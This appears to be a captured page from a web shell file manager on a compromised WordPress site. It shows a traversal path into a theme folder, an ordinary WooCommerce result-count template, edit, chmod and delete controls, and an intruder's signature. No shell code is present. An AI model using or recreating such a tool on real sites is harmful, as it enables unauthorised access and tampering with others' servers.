Submit
Path:
~
/
/
proc
/
thread-self
/
root
/
home
/
getwphos
/
www
/
brueggemannfh
/
wp-content
/
themes
/
wuko
/
woocommerce
/
addons
/
File Content:
addons-result-count.php
<?php if ( ! defined( 'ABSPATH' ) ) { exit; } ?><p class="woocommerce-result-count"><?php $paged = max( 1, $query->get( 'paged' ) ); $per_page = $query->get( 'posts_per_page' ); $total = $query->found_posts; $first = ( $per_page * $paged ) - $per_page + 1; $last = min( $total, $query->get( 'posts_per_page' ) * $paged ); if ( 1 == $total ) { _e( 'Showing the single result', 'wuko' ); } elseif ( $total <= $per_page || -1 == $per_page ) { printf( esc_html__( 'Showing all %d results', 'wuko' ), $total ); } else { printf( _x( 'Showing %1$d–%2$d of %3$d results', '%1$d = first, %2$d = last, %3$d = total', 'wuko' ), $first, $last, $total ); } ?></p>
Edit
Rename
Chmod
Delete
FILE
FOLDER
Name
Size
Permission
Action
addons-orderby.php
2054 bytes
0644
addons-result-count.php
711 bytes
0644
N4ST4R_ID | Naxtarrr